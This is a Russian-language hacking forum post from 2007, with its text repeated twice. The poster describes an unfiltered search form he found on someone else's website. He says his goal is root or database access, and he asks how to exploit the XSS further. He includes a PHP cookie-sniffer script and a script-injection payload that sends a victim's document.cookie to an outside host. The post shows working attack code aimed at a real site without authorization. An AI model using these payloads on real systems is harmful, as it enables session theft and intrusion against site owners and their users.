Lizardman
14.02.2007, 01:35
День добрый.
Наткнулся недавно на одном сайте на форму, в которой вообще не идет фильтрация. Т.е. <script>alert()</script> проходит. Причем сначала пытался замаскировать скрипт, но потом выяснил, что все и так проходит.
Это форма поиска, движок самописный, на полноценном хосте.
Отсюда вопрос- что с такой формы можно поиметь? Насколько я понял из статей, можно вставить ссылку на сниффер и кинуть админу, тем самым подтибрив его куки. Но этот способ не самый подходящий, т.к. цель- рут/бд, а не админка на сайте.
Если куки- единственный вариант, то как все-таки зарегить снифер на античате? Прохожу процесс регистрации, но там сказано- если вводили пароль, то придется ввести его и при входе в сниффер. Но на деле пароль и логин не спрашиваются.
Пробовал также сделать собственный сниффер.
<?php> $query = $_SERVER['QUERY_STRING'];
$query .= "\n";
$db="cookies.txt";
$fh=fopen ($db, "a+");
fputs ($fh, "$query");
?>
Вставлял ссылку
http://***.ru/***<script>document.location.replace('http://***2.ru/sniff.php?com='+document.cookie);</script>
Соотвественно, выложил на бесплатный хост jino-net.ru, создал файл cookies.txt, установил права на запись. Но все равно не пашет, размер файла не меняется с 0 кб.
Все таки, интересуют другие варианты использования XSS, но в инете вылезеют десятки однотипных статей по куки.
Буду признателен за помошь.
Наткнулся недавно на одном сайте на форму, в которой вообще не идет фильтрация. Т.е. <script>alert()</script> проходит. Причем сначала пытался замаскировать скрипт, но потом выяснил, что все и так проходит.
Это форма поиска, движок самописный, на полноценном хосте.
Отсюда вопрос- что с такой формы можно поиметь? Насколько я понял из статей, можно вставить ссылку на сниффер и кинуть админу, тем самым подтибрив его куки. Но этот способ не самый подходящий, т.к. цель- рут/бд, а не админка на сайте.
Если куки- единственный вариант, то как все-таки зарегить снифер на античате? Прохожу процесс регистрации, но там сказано- если вводили пароль, то придется ввести его и при входе в сниффер. Но на деле пароль и логин не спрашиваются.
Пробовал также сделать собственный сниффер.
<?php> $query = $_SERVER['QUERY_STRING'];
$query .= "\n";
$db="cookies.txt";
$fh=fopen ($db, "a+");
fputs ($fh, "$query");
?>
Вставлял ссылку
http://***.ru/***<script>document.location.replace('http://***2.ru/sniff.php?com='+document.cookie);</script>
Соотвественно, выложил на бесплатный хост jino-net.ru, создал файл cookies.txt, установил права на запись. Но все равно не пашет, размер файла не меняется с 0 кб.
Все таки, интересуют другие варианты использования XSS, но в инете вылезеют десятки однотипных статей по куки.
Буду признателен за помошь.